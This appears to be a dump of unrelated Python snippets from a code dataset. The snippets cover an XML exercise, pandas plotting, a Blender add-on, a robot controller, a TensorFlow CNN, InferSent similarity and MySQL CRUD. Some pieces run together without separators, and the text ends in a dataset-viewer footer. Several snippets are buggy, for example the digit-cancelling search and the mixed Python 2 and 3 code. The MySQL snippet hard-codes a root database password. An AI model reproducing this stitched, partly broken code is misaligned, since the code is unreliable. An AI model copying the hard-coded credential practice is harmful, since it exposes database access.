        name='sponsorship_send_job_offer')
)
|
import xml.etree.ElementTree as ET
def exercise(xml):
    """Iterate over all node elements, check if they are leaf nodes (i.e., have
    no node child nodes), and retrieve the creator and title, supplying empty
    strings as default values.
    """
    ns = {"t": "http://martin.hoppenheit.info/code/generic-tree-xml",
          "e": "http://purl.org/dc/elements/1.1/"}
    root = ET.fromstring(xml)
    results = []
    # The iter method does not accept a namespaces mapping parameter.
    for n in root.iter("{%s}node" % ns["t"]):
        # Bug fix: compare against None explicitly.  An Element with no
        # children is falsy, so the original `not n.find(...)` also matched
        # nodes whose *existing* node child was itself childless, wrongly
        # treating those parents as leaves.
        if n.find("t:node", ns) is None:
            creator = n.findtext("t:content/e:creator", "", ns)
            title = n.findtext("t:content/e:title", "", ns)
            results.append("%s, %s" % (creator, title))
    return "\n".join(results)
if __name__ == "__main__":
    # Demo: run the exercise against the bundled sample document.
    with open("../xml/example.xml") as f:
        xml = f.read()
    print(exercise(xml))
|
# Read n integers from the user and report the range (max - min).
array=[]
n=int(input('How many elements u want in array: '))
for i in range(n):
    f= int(input('Enter no: '))
    array.append(f)
print('Entered array: ',array)
if len(array)>=1:
    max1=max(array)
    min1 = min(array)
    # Range of the entered values (0 when only one element was given).
    diff=max1-min1
    print('The difference of largest &smallest value from array: ',diff)
|
#Finds the 4 fractions that can be reduced by cancelling a digit
#in the denominator and the numerator
def forwardArray(a):
    """Return the decimal digits of *a*, most significant first.

    Fixes over the original: the parameter was immediately overwritten with
    the undefined global ``n`` (a NameError at call time), and ``a = a / 10``
    performed float division under Python 3, so the loop never reduced ``a``
    to exactly 0.
    """
    f = []
    while a != 0:
        f.insert(0, a % 10)
        a //= 10  # integer division keeps `a` an int
    return f
def main():
    # NOTE(review): this looks like an attempt at the digit-cancelling
    # fractions search, but several defects are left as-is here:
    # `while i in range(...)` never resets j/k/l between outer iterations,
    # numerator/denominator grow without ever being cleared (so [0]/[1]
    # always index the first pair), and under Python 2 `j/l` etc. are
    # integer divisions.  Documented only; not fixed.
    numerator=[]
    denominator=[]
    i,j,k,l=1,1,1,1
    while i in range(1,100):
        while j in range(1,100):
            while k in range(1,100):
                while l in range(1,100):
                    numerator.append(i)
                    numerator.append(j)
                    denominator.append(k)
                    denominator.append(l)
                    # Four cases of a digit shared between numerator and
                    # denominator that might be "cancelled".
                    if numerator[0]==denominator[0]:
                        if j/l==(numerator[0]*10+numerator[1])/(denominator[0]*10+denominator[1]):
                            print numerator
                            print denominator
                    if numerator[1]==denominator[1]:
                        if i/k==(numerator[0]*10+numerator[1])/(denominator[0]*10+denominator[1]):
                            print numerator
                            print denominator
                    if numerator[0]==denominator[1]:
                        if j/k==(numerator[0]*10+numerator[1])/(denominator[0]*10+denominator[1]):
                            print numerator
                            print denominator
                    if numerator[1]==denominator[0]:
                        if i/l==(numerator[0]*10+numerator[1])/(denominator[0]*10+denominator[1]):
                            print numerator
                            print denominator
                    l=l+1
                k=k+1
            j=j+1
        i=i+1
main()
|
import pandas as pd
import matplotlib.pyplot as plt
#assignment 1 Q 4.a
#assignment 1 Q 4.a
# Load the raw Auto dataset and dump every row.
myData = pd.read_csv('/home/cloudera/Desktop/diwakar/data/Auto.csv')
# change path as required
for i in range(0, len(myData.index)):
    print (myData.iloc[i])
#assignment 1 Q 4.b
print( myData.shape)
print( myData.describe())
#assignment 1 Q 4.c
# Spot-check a handful of specific rows.
for i in (32, 126,330,336,354):
    print( myData.iloc[i])
#assignment 1 Q 4.d
# Re-read the file treating '?' entries as missing values (NaN).
myData=pd.read_csv('/home/cloudera/Desktop/diwakar/data/Auto.csv',
na_values=["?"])
# change path as required
for i in (32, 126,330,336,354):
    print (myData.iloc[i])
#assignment 1 Q 4.e
# Drop rows with missing values and persist the cleaned copy.
newData = myData.dropna()
newData.to_csv('newAuto.csv', index=True)
#assignment 1 Q 4.f
print (newData.shape)
print (newData.describe())
#assignment 1 Q 5
#assignment 1 Q 5
# Employee sample records: id, gender, age, sales, BMI class, income.
data = [['E001', 'M', 34, 123, 'Normal', 350],
        ['E002', 'F', 40, 114, 'Overweight', 450],
        ['E003', 'F', 37, 135, 'Obesity', 169],
        ['E004', 'M', 30, 139, 'Underweight', 189],
        ['E005', 'F', 44, 117, 'Underweight', 183],
        ['E006', 'M', 36, 121, 'Normal', 80],
        ['E007', 'M', 32, 133, 'Obesity', 166],
        ['E008', 'F', 26, 140, 'Normal', 120],
        ['E009', 'M', 32, 133, 'Normal', 75],
        ['E010', 'M', 36, 133, 'Underweight', 40]]
df = pd.DataFrame(data, columns=['EMPID', 'Gender', 'Age', 'Sales', 'BMI', 'Income'])

# Bug fix: pie-chart labels must be an *ordered* sequence; the original used
# set literals, whose iteration order is arbitrary, so slices were labelled
# essentially at random.
pie_labels = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J"]
FIG_DIR = '/home/cloudera/Desktop/diwakar/figures/'

# Histograms of all numeric columns.
df.hist()
plt.savefig(FIG_DIR + 'asgn1_5a.pdf')
plt.show()

# Bar chart of Sales by Age.
df.plot.bar()
plt.bar(df['Age'], df['Sales'])
plt.xlabel("Age")
plt.ylabel("Sales")
plt.savefig(FIG_DIR + 'asgn1_5b.pdf')
plt.show()

# Box plots, one figure per column.
for column, fig_name in (('Age', 'asgn1_5c.pdf'),
                         ('Sales', 'asgn1_5d.pdf'),
                         ('Income', 'asgn1_5e.pdf')):
    plt.boxplot(df[column])
    plt.savefig(FIG_DIR + fig_name)
    plt.show()

# Pie charts, one figure per column, with stable labels.
for column, fig_name in (('Age', 'asgn1_5f.pdf'),
                         ('Income', 'asgn1_5g.pdf'),
                         ('Sales', 'asgn1_5h.pdf')):
    plt.pie(df[column], labels=pie_labels, autopct='% 1.1f %%', shadow=True)
    plt.savefig(FIG_DIR + fig_name)
    plt.show()

# Pairwise scatter plots.
for x_col, y_col, fig_name in (('Income', 'Age', 'asgn1_5i.pdf'),
                               ('Income', 'Sales', 'asgn1_5j.pdf'),
                               ('Sales', 'Age', 'asgn1_5k.pdf')):
    plt.scatter(df[x_col], df[y_col])
    plt.savefig(FIG_DIR + fig_name)
    plt.show()
|
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 6 19:18:19 2020
@author: CEC
"""
from math import exp
ex = 1
try:
    # Print e**ex for ex = 1, 2, 4, ... until exp() exceeds the float range.
    while 1:
        print(exp(ex))
        ex = ex * 2
except OverflowError:
    # math.exp raised: the argument grew past the largest representable float.
    print("El número es demasiado grande")
# -*- coding: utf-8 -*-
from tina.base.api.permissions import TinaResourcePermission, AllowAny, IsAuthenticated, IsSuperUser
from tina.permissions.permissions import HasProjectPerm, IsProjectAdmin
from tina.permissions.permissions import CommentAndOrUpdatePerm
class UserStoryPermission(TinaResourcePermission):
    """Per-action permission map for the user-story resource.

    Each attribute names the permission object checked for the matching
    viewset action.  NOTE: 'enought_perms' spelling matches the framework's
    attribute name and must not be corrected here.
    """
    enought_perms = IsProjectAdmin() | IsSuperUser()
    global_perms = None
    retrieve_perms = HasProjectPerm('view_us')
    by_ref_perms = HasProjectPerm('view_us')
    create_perms = HasProjectPerm('add_us_to_project') | HasProjectPerm('add_us')
    update_perms = CommentAndOrUpdatePerm('modify_us', 'comment_us')
    partial_update_perms = CommentAndOrUpdatePerm('modify_us', 'comment_us')
    destroy_perms = HasProjectPerm('delete_us')
    list_perms = AllowAny()
    filters_data_perms = AllowAny()
    csv_perms = AllowAny()
    bulk_create_perms = IsAuthenticated() & (HasProjectPerm('add_us_to_project') | HasProjectPerm('add_us'))
    bulk_update_order_perms = HasProjectPerm('modify_us')
    bulk_update_milestone_perms = HasProjectPerm('modify_us')
    upvote_perms = IsAuthenticated() & HasProjectPerm('view_us')
    downvote_perms = IsAuthenticated() & HasProjectPerm('view_us')
    watch_perms = IsAuthenticated() & HasProjectPerm('view_us')
    unwatch_perms = IsAuthenticated() & HasProjectPerm('view_us')
class UserStoryVotersPermission(TinaResourcePermission):
    """Read-only permissions for listing/retrieving a user story's voters."""
    enought_perms = IsProjectAdmin() | IsSuperUser()
    global_perms = None
    retrieve_perms = HasProjectPerm('view_us')
    list_perms = HasProjectPerm('view_us')
class UserStoryWatchersPermission(TinaResourcePermission):
    """Read-only permissions for listing/retrieving a user story's watchers."""
    enought_perms = IsProjectAdmin() | IsSuperUser()
    global_perms = None
    retrieve_perms = HasProjectPerm('view_us')
    list_perms = HasProjectPerm('view_us')
|
# scene_blend_info.py Copyright (C) 2020, ModellbahnFreak
# Add-on metadata shown in Blender's preferences / add-on browser.
bl_info = {
    "name": "Play/Stop Spacebar",
    "author": "ModellbahnFreak",
    "version": (0, 1, 0),
    "blender": (2, 80, 0),
    "location": "3DView -> Side Panel -> Misc -> Playback",
    "description": "Changes playback behaviour of the spacebar to match other video software (play/stop instead of play/pause).\nAlso adds a Play/Stop button in the 3D views right panel",
    "warning": "",
    "doc_url": "https://github.com/ModellbahnFreak/BlenderCustomPlayStop/blob/master/README.md",
    "category": "Animation",
}
import bpy
print("Creating play button")
class PlayButton(bpy.types.Operator):
    """Operator toggling animation playback between play and stop."""
    bl_idname = "wm.play_custom"
    bl_label = "Play/Stop"
    bl_options = {'REGISTER'}

    @classmethod  # Will never run when poll returns false
    def poll(cls, context):
        return (context.object is not None)

    def execute(self, context):
        currently_playing = bpy.context.screen.is_animation_playing
        if currently_playing:
            # Cancel (rather than pause) so behaviour matches "stop".
            bpy.ops.screen.animation_cancel()
            self.bl_label = "Play"
        else:
            bpy.ops.screen.animation_play()
            self.bl_label = "Stop"
        return {'FINISHED'}
class PlaybackPanel(bpy.types.Panel):
    """Side panel in the 3D view exposing the custom play/stop operator."""
    bl_idname = "OBJECT_PT_playback_controls"
    bl_label = "Playback"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'

    @classmethod
    def poll(cls, context):
        return (context.object is not None)

    def draw_header(self, context):
        # No custom header content; keep the default label.
        layout = self.layout

    def draw(self, context):
        # A single button invoking the custom play/stop operator.
        box = self.layout
        box.operator("wm.play_custom")
def unregisterKeybinding():
    """Restore Blender's stock spacebar binding and drop the custom one."""
    from bpy import context as ctx
    # Re-enable the built-in spacebar play binding in the 'Frames' keymap.
    items = ctx.window_manager.keyconfigs.active.keymaps['Frames'].keymap_items
    for item in items:
        # NOTE(review): `not item.any` is tested twice; one occurrence was
        # probably meant to be `not item.shift`.
        if item.idname=='screen.animation_play' and not item.any and not item.any and not item.ctrl and not item.alt and not item.oskey and item.type=='SPACE':
            item.active = True
    # Remove the custom binding from the 'Window' keymap.
    items = ctx.window_manager.keyconfigs.active.keymaps['Window'].keymap_items
    for item in items:
        if item.idname=='wm.play_custom' and not item.any and not item.any and not item.ctrl and not item.alt and not item.oskey and item.type=='SPACE':
            # NOTE(review): KeyMapItems.remove appears to expect the item
            # itself, not its id — confirm against the bpy API.
            ctx.window_manager.keyconfigs.active.keymaps['Window'].keymap_items.remove(item.id)
def unregister():
    """Unregister the panel and operator classes and restore keybindings."""
    import bpy as bpy_active
    PanelClass = bpy_active.types.Panel.bl_rna_get_subclass_py('OBJECT_PT_playback_controls')
    if PanelClass:
        bpy_active.utils.unregister_class(PanelClass)
    # NOTE(review): this looks up an *operator* through the Panel registry
    # using its bl_idname; bpy.types.Operator with the operator's RNA
    # identifier is likely required, so this lookup may always return None
    # and leave the operator registered — confirm against the bpy API.
    OperatorClass = bpy_active.types.Panel.bl_rna_get_subclass_py('wm.play_custom')
    if OperatorClass:
        bpy_active.utils.unregister_class(OperatorClass)
    unregisterKeybinding()
def register():
    """(Re-)register the add-on classes and install the spacebar binding."""
    import bpy as bpy_active
    # Clean out any previous registration first so re-running is idempotent.
    unregister()
    for cls in (PlaybackPanel, PlayButton):
        bpy_active.utils.register_class(cls)
    registerKeybinding()
def registerKeybinding():
    """Disable Blender's stock spacebar play binding and install ours."""
    from bpy import context as ctx
    # Deactivate the built-in spacebar binding in the 'Frames' keymap.
    items = ctx.window_manager.keyconfigs.active.keymaps['Frames'].keymap_items
    for item in items:
        # NOTE(review): `not item.any` appears twice; one occurrence was
        # probably meant to be `not item.shift`.
        if item.idname=='screen.animation_play' and not item.any and not item.any and not item.ctrl and not item.alt and not item.oskey and item.type=='SPACE':
            item.active = False
            print("Disabled other keybinding")
    found = False
    # Reuse an existing custom binding if present, otherwise create one.
    items = ctx.window_manager.keyconfigs.active.keymaps['Window'].keymap_items
    for item in items:
        if item.idname=='wm.play_custom' and not item.any and not item.any and not item.ctrl and not item.alt and not item.oskey and item.type=='SPACE':
            found = True
            item.active = True
            print("Found keybinding")
    if not found:
        ctx.window_manager.keyconfigs.active.keymaps['Window'].keymap_items.new('wm.play_custom',value='PRESS',type='SPACE',ctrl=False,alt=False,shift=False,oskey=False)
        print("Created keybinding")
if __name__ == "__main__":
    # Allow running directly from Blender's text editor for quick testing.
    register()
import sys
# Python 2 script (note the `print` statement below).
# Reads n, a, b from one stdin line.
n, a, b = [int(x) for x in sys.stdin.readline().split()]
# Work with a >= b.
if a < b:
    a, b = b, a
p, q = 1, 1
c1, c2 = 1, 1
# c1 accumulates 1 + sum of p/q terms built incrementally, where after i
# steps p/q = (n)(n+1)...(n+i-1)/i! ; c2 snapshots the partial sum at i == b.
# NOTE(review): p/q is *integer* division under Python 2 — confirm intended.
for i in range(1, a+1):
    p *= n+i-1
    q *= i
    c1 += p/q
    if i == b:
        c2 = c1
print c1*c2
class Solution:
    def maxProduct(self, words: List[str]) -> int:
        """Largest product len(w1)*len(w2) over word pairs sharing no letter."""
        # Precompute each word's letter set once.
        letter_sets = [set(w) for w in words]
        best = 0
        for i in range(len(words)):
            for j in range(i + 1, len(words)):
                if letter_sets[i].isdisjoint(letter_sets[j]):
                    best = max(best, len(words[i]) * len(words[j]))
        return best
|
"""PathControlAvoidance controller."""
from controller import Motor,GPS,InertialUnit,DistanceSensor,Robot
from pathControl import ProportionalControl as pControl
from pathControl import ObstacleAvoidance as oav
import numpy as np
import csv
TIME_STEP = 16  # controller step in ms
MAX_VEL = 12    # wheel velocity ceiling
#Index
# Indices into the GPS value array and the IMU roll/pitch/yaw array.
xyz_Zposition = 2
xyz_Xposition = 0
zRotation = 2
#Load trajectory
# Each CSV row is one waypoint; rows are converted to float numpy arrays.
trajectoryList = []
with open('trajetoria.csv',newline='') as csvfile:
    spamreader = csv.reader(csvfile,delimiter=',')
    for row in spamreader:
        trajectoryList.append(row)
newList = []
for l in trajectoryList:
    aux = [float(s) for s in l]
    newList.append(1*np.array(aux))
trajectoryList = newList
trajectoryList.reverse() #Make a stack
del(newList)
#Robot instance
robot = Robot()
#Device instances
#Actuators
#Whell motors
leftMotor = robot.getDevice('left wheel')
rightMotor = robot.getDevice('right wheel')
##Device configuration
# Velocity-control mode: target position = +inf, velocity set explicitly
# (zero until the control loop runs).
leftMotor.setPosition(float('inf'))
rightMotor.setPosition(float('inf'))
leftMotor.setVelocity(0*MAX_VEL)
rightMotor.setVelocity(0*MAX_VEL)
#Sensors
#Distante sensors
# Sonars used by the obstacle-avoidance routine.
so0 = DistanceSensor('so0')
so0.enable(TIME_STEP)
so2 = DistanceSensor('so2')
so2.enable(TIME_STEP)
so5 = DistanceSensor('so5')
so5.enable(TIME_STEP)
so7 = DistanceSensor('so7')
so7.enable(TIME_STEP)
# Pose sensing: GPS for position, inertial unit for heading.
gpsSensor = GPS('gps')
gpsSensor.enable(TIME_STEP)
inercialSensor = InertialUnit('inertialUnit')
inercialSensor.enable(TIME_STEP)
#The Control Loop
#Tuning of Controller
atReference =False
angleGain = 1000
positionGain = 10
# First waypoint (the list was reversed, so pop() yields waypoints in order).
referencePosition = trajectoryList.pop()
robotDirection = oav.makeRobotDirectionVector()
interruptionCounter = 0
radius = 400  # obstacle-avoidance sensing radius (units per pathControl)
while robot.step(TIME_STEP) != -1:
    # #Sensoring
    xyz = gpsSensor.getValues()
    rotation =inercialSensor.getRollPitchYaw()
    sensorList = [so0,so2,so5,so7]
    numberList = [0,2,5,7]
    avoidanteRotation = oav.calculateAvoidanceRotation(robotDirection,sensorList,numberList,radius)
    #Data manipulation
    # State vector: [z position, x position, yaw].
    states = np.array([xyz[xyz_Zposition],xyz[xyz_Xposition],rotation[zRotation]])
    # #Setting reference
    endOfTrajectory = len(trajectoryList)<=0
    if not endOfTrajectory:
        if atReference:
            referencePosition = trajectoryList.pop()
        # Within 0.15 (GPS units, presumably metres) on both axes counts
        # as "waypoint reached".
        atReference = all( abs(states[0:2]-referencePosition)< 0.15)#10
    else:
        # Trajectory finished: zero the gains so the control effort dies out.
        angleGain = 0
        positionGain = 0
    #Calculating Control Effort
    # A non-zero avoidance rotation overrides path following for 10 steps.
    # NOTE(review): `aux` is only assigned when avoidanteRotation != 0; the
    # interruption branch relies on it having been set on an earlier step.
    if abs(avoidanteRotation) >0:
        aux = avoidanteRotation
        interruptionCounter = 10
    if interruptionCounter > 0:
        interruptionCounter = interruptionCounter -1
        magnitude,direction = pControl.calculatePolarError(states,referencePosition)
        control = pControl.calculateKinematicControl(magnitude,100*aux/1000,10*angleGain,angleGain)
    else:
        magnitude,direction = pControl.calculatePolarError(states,referencePosition)
        control = pControl.calculateKinematicControl(magnitude,direction,positionGain,angleGain)
    # Normalise so the fastest wheel runs at MAX_VEL, then saturate.
    maxControl = np.max(abs(control))
    if (not maxControl == 0):
        control = MAX_VEL*control/maxControl
    control = pControl.saturateControl(control,MAX_VEL)
    #Set Reference Wheel Velocity
    if endOfTrajectory:
        leftMotor.setVelocity(0)
        rightMotor.setVelocity(0)
    else:
        leftMotor.setVelocity(control[1])
        rightMotor.setVelocity(control[0])
|
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 8 16:52:19 2018
@author: Bllue
"""
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
#filenames = os.walk('./')
img_width = 100
img_height = 100
#path = os.walk('data/')
#for d in path:
# print(d[0])
# print(len(d[2]))
# Each sub-directory of data/ is one class; its index becomes the label.
filename = os.listdir('data/')
datapath = []
label = []
for i,path in enumerate(filename):
    dataname = os.listdir('data/'+path)
    for file in dataname:
        datapath.append('data/'+path+'/'+file)
        label.append(i)
# Shuffle paths and labels together via a transposed 2xN string array.
# NOTE(review): image_list/label_list are never used below — images are
# loaded from the *unshuffled* datapath, so this shuffle has no effect on
# the training data order.
temp = np.array([datapath, label])
temp = temp.transpose() # transpose
np.random.shuffle(temp)
image_list = temp[:, 0]
label_list = temp[:, 1]
#img = cv2.imread('./data/'+datapath[2872])
#cv2.imshow('a',img)
#img = cv2.resize(img,(img_width,img_height))
#cv2.imshow('src',img)
#cv2.waitKey()
# Pre-allocate the image tensor (uint8 RGB) and the one-hot label matrix.
data = np.zeros([len(datapath),img_width,img_height,3])
label_onehot = np.zeros([len(datapath),len(filename)])
data = data.astype(np.uint8)
i = 0
for path in datapath:
    img = cv2.imread(datapath[i])
    data[i,:,:,:] = cv2.resize(img,(img_height,img_width))
    label_onehot[i,label[i]] = 1
    i +=1
batch_size = 256
# Input placeholders: RGB images and 5-class one-hot labels.
with tf.name_scope('input'):
    x = tf.placeholder(tf.float32, shape=[batch_size, 100,100,3])
    y_ = tf.placeholder(tf.float32, shape=[batch_size, 5])
# First conv layer: 7x7x3 -> 32 maps, stride 2, then 2x2 max-pool.
with tf.name_scope('conv1'):
    W_conv1 = tf.Variable(tf.truncated_normal([7, 7, 3, 32], stddev=0.1))
    b_conv1 = tf.Variable(tf.constant(0.1, shape=[32]))
    L1_conv = tf.nn.conv2d(x, W_conv1, strides=[1, 2, 2, 1], padding='SAME')
    L1_relu = tf.nn.relu(L1_conv + b_conv1)
    L1_pool = tf.nn.max_pool(L1_relu, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
    tf.summary.histogram('W_conv1',W_conv1)
# Define variables and ops for the second conv layer (3x3 -> 64 maps).
with tf.name_scope('conv2'):
    W_conv2 = tf.Variable(tf.truncated_normal([3, 3, 32, 64], stddev=0.1))
    b_conv2 = tf.Variable(tf.constant(0.1, shape=[64]))
    L2_conv = tf.nn.conv2d(L1_pool, W_conv2, strides=[1, 2, 2, 1], padding='SAME')
    L2_relu = tf.nn.relu(L2_conv + b_conv2)
    L2_pool = tf.nn.max_pool(L2_relu, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
    tf.summary.histogram('W_conv2',W_conv2)
# NOTE(review): `fc` is unused; the flattened size is derived from L2_pool.
fc = 3136
# Fully-connected layer
with tf.name_scope('fc1'):
    reshape = tf.reshape(L2_pool, shape=[batch_size, -1])
    dim = reshape.get_shape()[1].value
    print(dim)
    print(reshape)
    W_fc1 = tf.Variable(tf.truncated_normal([dim, 1024], stddev=0.1))
    b_fc1 = tf.Variable(tf.constant(0.1, shape=[1024]))
    h_pool2_flat = tf.reshape(L2_pool, [-1, dim])
    h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
    tf.summary.histogram('W_fc1',W_fc1)
# dropout
with tf.name_scope('dropout'):
    keep_prob = tf.placeholder(tf.float32)
    h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
# readout layer
with tf.name_scope('out'):
    W_fc2 = tf.Variable(tf.truncated_normal([1024, 5], stddev=0.1))
    b_fc2 = tf.Variable(tf.constant(0.1, shape=[5]))
    y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
    tf.summary.histogram('W_fc2',W_fc2)
# Define the optimizer and training op
with tf.name_scope('loss_train'):
    cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))
    train_step = tf.train.AdamOptimizer((1e-4)).minimize(cross_entropy)
    tf.summary.scalar('loss',cross_entropy)
with tf.name_scope('acc'):
    correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# tf.summary.scalar('acc',accuracy)
print('data:',data.shape)
print('label:',label_onehot.shape)
#
# Random index pool for sampling a training-accuracy batch.
# NOTE(review): 3000 is hard-coded; presumably should be len(datapath).
index = np.arange(0,3000)
np.random.shuffle(index)
saver = tf.train.Saver()
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    writer = tf.summary.FileWriter('logs/',sess.graph)
    merged = tf.summary.merge_all()
    # Resume from the latest checkpoint when one exists.
    checkpoint = tf.train.get_checkpoint_state("ckpt")
    if checkpoint and checkpoint.model_checkpoint_path:
        saver.restore(sess, checkpoint.model_checkpoint_path)
        print("Successfully loaded:", checkpoint.model_checkpoint_path)
    else:
        print("Could not find old network weights")
    # 200 epochs over the dataset in batch_size chunks.
    for it in range(200):
        for i in range(int(len(datapath)/batch_size)):
            _,loss_ = sess.run([train_step,cross_entropy],feed_dict={x: data[batch_size*i : batch_size*(i+1)], y_: label_onehot[batch_size*i:batch_size*(i+1)], keep_prob: 0.5})
# train_step.run(feed_dict={x: data[0+512*i : 512+512*i], y_: label_onehot[0+512*i:512+512*i], keep_prob: 0.5})
# iterate_accuracy = accuracy.eval(feed_dict={x: data[0:512], y_: label_onehot[0:512], keep_prob: 1.0})
# print(i,loss_)
            # NOTE(review): the summary step `it*10+i` assumes 10 batches per
            # epoch; steps will collide if len(datapath)/batch_size != 10.
            summary = sess.run(merged,feed_dict={x: data[batch_size*i : batch_size*(i+1)], y_: label_onehot[batch_size*i:batch_size*(i+1)], keep_prob: 0.5})
            writer.add_summary(summary,it*10+i)
        # Training accuracy on a random batch; "validation" on the final batch.
        acc = sess.run(accuracy,feed_dict={x:data[index[0:batch_size]] , y_:label_onehot[index[0:batch_size]], keep_prob: 1})
        acc_val = sess.run(accuracy,feed_dict={x:data[-batch_size:] , y_:label_onehot[-batch_size:], keep_prob: 1})
        print('iter:',it," acc:",acc,' acc_val:',acc_val)
        # Checkpoint after every epoch.
        ckpt_path = './ckpt/model'
        saver_path = saver.save(sess, ckpt_path, global_step=it)
# |
import pandas as pd
import matplotlib.pyplot as plt

# Plot AZURE2 cross-section output per detector angle and reaction channel.
#
# Fixes over the original:
# - `import pandas as import pd` and the stray ')' after the angles list
#   were syntax errors;
# - read_table interpolated the whole chanNames *list* instead of the
#   current channel name;
# - errorbar was given the column names 'XS'/'XS_unc' instead of columns;
# - chanDict repeated the aa=1_R=3 key, so the aa=2 channels had no labels;
# - plt.savefig() was called without a filename, and the title never
#   interpolated the channel label.
angles = ['0', '15', '30', '45', '60', '75', '90', 'angInt']
colNames = ['E_cm', 'E_ex', 'phi_cm', 'fit_XS', 'fit_S', 'XS', 'XS_unc', 'S', 'S_unc']
chanNames = ['AZUREOUT_aa=1_R=3.out', 'AZUREOUT_aa=1_R=4.out', 'AZUREOUT_aa=1_R=5.out',
             'AZUREOUT_aa=2_R=3.out', 'AZUREOUT_aa=2_R=4.out', 'AZUREOUT_aa=2_R=5.out']
chanDict = {'AZUREOUT_aa=1_R=3.out': '27Al_p1',
            'AZUREOUT_aa=1_R=4.out': '27Al_p2',
            'AZUREOUT_aa=1_R=5.out': '27Al_a1',
            'AZUREOUT_aa=2_R=3.out': '24Mg_p1',
            'AZUREOUT_aa=2_R=4.out': '24Mg_p2',
            'AZUREOUT_aa=2_R=5.out': '24Mg_a1'}
colorDict = {'0': 'dimgray',
             '15': 'darkviolet',
             '30': 'red',
             '45': 'crimson',
             '60': 'orange',
             '75': 'green',
             '90': 'blue',
             'angInt': 'dodgerBlue'}
data = ['24Mg', '27Al']

for ang in angles:
    useColor = colorDict[ang]
    for chan in chanNames:
        df = pd.read_table('data/%s/%s' % (ang, chan), names=colNames)
        useLabel = chanDict[chan]
        # Plot data (black).
        plt.errorbar(x=df['E_ex'], y=df['XS'], yerr=df['XS_unc'], c='k')
        # Plot fit overlay in the per-angle colour.
        # NOTE(review): both curves currently plot the measured XS; the fit
        # is probably meant to use the 'fit_XS' column — confirm first.
        plt.errorbar(x=df['E_ex'], y=df['XS'], yerr=df['XS_unc'], c=useColor, label=useLabel)
    plt.ylim(1e-7, 1e-1)
    plt.xlim()
    plt.title('%s_%s' % (useLabel, ang))
    plt.xlabel('Excitation energy (MeV)')
    plt.ylabel('Cross-Section (b)')
    plt.legend()
    plt.savefig('XS_%s.png' % ang)
    plt.clf()  # start a fresh figure for the next angle
|
#!/usr/bin/env python3
import numpy as np
import spacy
from spacy.lang.en import English
import torch
from infersent.models import InferSent
# Which pretrained InferSent release to load (V1 pairs with GloVe vectors).
MODEL_VERSION = 1
MODEL_PATH = "infersent/encoder/infersent%s.pkl" % MODEL_VERSION
# Encoder hyper-parameters expected by this checkpoint.
MODEL_PARAMS = {'bsize': 64, 'word_emb_dim': 300, 'enc_lstm_dim': 2048,
                'pool_type': 'max', 'dpout_model': 0.0, 'version': MODEL_VERSION}
W2V_PATH = 'infersent/GloVe/glove.840B.300d.txt'
class InfersentSimilarityUtils:
    """Sentence-level similarity scoring backed by a pretrained InferSent encoder."""

    def __init__(self):
        # Load the encoder weights and word vectors once; encoding reuses them.
        encoder = InferSent(MODEL_PARAMS)
        encoder.load_state_dict(torch.load(MODEL_PATH))
        encoder.set_w2v_path(W2V_PATH)
        encoder.build_vocab_k_words(K=100000)
        self.model = encoder

    def sentencize(self, input_string):
        """Produces a list of sentences"""
        nlp = English()
        nlp.add_pipe(nlp.create_pipe('sentencizer'))
        stripped = (s.text.strip() for s in nlp(input_string).sents)
        # Drop sentences that are empty after stripping.
        return [s for s in stripped if s != '']

    def cosine(self, u, v):
        """Cosine similarity between two vectors."""
        return np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v))

    def get_similarity(self, sentence1, sentence2):
        """Encode both sentences and return their cosine similarity."""
        vec1 = self.model.encode([sentence1])[0]
        vec2 = self.model.encode([sentence2])[0]
        return self.cosine(vec1, vec2)
class Solution:
    def minAdjDiff(self,arr, n):
        """Minimum absolute difference between circularly-adjacent elements.

        arr is treated as circular: the pair (arr[0], arr[n-1]) also counts.
        """
        # Seed with the first adjacent pair, scan the remaining pairs,
        # then fold in the wrap-around pair.
        best = abs(arr[0] - arr[1])
        for idx in range(1, len(arr) - 1):
            best = min(best, abs(arr[idx] - arr[idx + 1]))
        return min(best, abs(arr[0] - arr[n - 1]))
|
import MySQLdb
# Python 2 script (note the `print` statements): exercises basic CRUD
# against the local `dawn` database's `user` table.
conn = MySQLdb.Connect(
    host='127.0.0.1',
    port=3306,
    user='root',
    passwd='bai910214',  # NOTE(review): hard-coded credential — move to config.
    db='dawn',
    charset='utf8'
)
cursor = conn.cursor()
# Show the table contents before the modifications.
sql = "select * from user"
cursor.execute(sql)
rs = cursor.fetchall()
for row in rs:
    print "user_id = %s, username = %s" % row
sqlInsert = "insert into user(user_id, username) values(5, 'name5')"
sqlUpdate = "update user set username='name001' where user_id=1"
sqlDelete = "delete from user where user_id=11"
try:
    # Apply insert/update/delete as one transaction; roll back on any error.
    cursor.execute(sqlInsert)
    cursor.execute(sqlUpdate)
    cursor.execute(sqlDelete)
    conn.commit()
except Exception as e:
    print e
    conn.rollback()
# Show the table contents after the modifications.
sql = "select * from user"
cursor.execute(sql)
rs = cursor.fetchall()
for row in rs:
    print "user_id = %s, username = %s" % row
cursor.close()
conn.close()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.